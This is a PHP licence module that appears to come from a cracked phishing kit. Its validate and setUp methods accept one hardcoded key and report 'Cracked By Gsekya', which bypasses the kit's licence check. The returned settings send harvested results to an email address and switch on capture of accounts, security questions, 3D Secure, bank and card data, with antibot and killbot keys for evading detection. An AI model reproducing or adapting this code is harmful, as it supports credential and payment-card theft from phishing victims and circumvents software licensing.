<?php
defined("ACCESS") or die('Konz');

class license {
    private $server = "";
    private $key;
    private $KODE = "";
    private $version = "2.0";
    public function __construct($_key = []) {
        if (!isset($_key['key'])) {
            return "Access denied";
        } else {
            $this->key = $_key['key'];
        }
    }
    public function a16_blocker($ip) {
        return false;
    }
    public function create_logs($data, $type) {
        $file = fopen($_SERVER['DOCUMENT_ROOT']."/_arahmataAngin/static/log_access.txt","w");
        if(fwrite($file,"$data\r\n")) {
            $data = array(
                'status' => true,
                'message' => 'Successfully'
            );
        } else {
            $data = array(
                'status' => false,
                'message' => 'failed'
            );
        }
        fclose($file);
        return $data;
    }
    public function validate() {
        if ($this->key === "GSEKYA:71db160d488f5182eebe97aec399a18f") {
            $data = array(
                'status' => true,
                'data' => '{"get_account":"off","get_email":"off","get_sq":"off","double_email":"off","result":"adjest@israelmail.com","parameter":"verify","antibot":"","killbot":""}',
                'message' => 'Cracked By Gsekya'
            );
        } else {
            $data = array(
                'status' => false,
                'message' => 'SALAH GOBLOK!'
            );
        }
        return $data;
    }
    public function setUp() {
        if ($this->key === "GSEKYA:71db160d488f5182eebe97aec399a18f") {
            $data = array(
                'status' => true,
                'message' => 'Successfully Installed'
            );
        } else {
            $data = array(
                'status' => false,
                'message' => 'SALAH GOBLOK!'
            );
        }
        return $data;
    }
    public function generate_setting() {
        return array(
            'result' => 'EMAIL',
            'parameter' => 'verify',
            'antibot' => 'apikey',
            'killbot' => 'apikey',
            'get_account' => 'off',
            'get_email' => 'off',
            'get_3dsecure' => 'off',
            'get_bank' => 'off',
            'double_email' => 'off',
            'double_card' => 'off',
        );
    }

    }
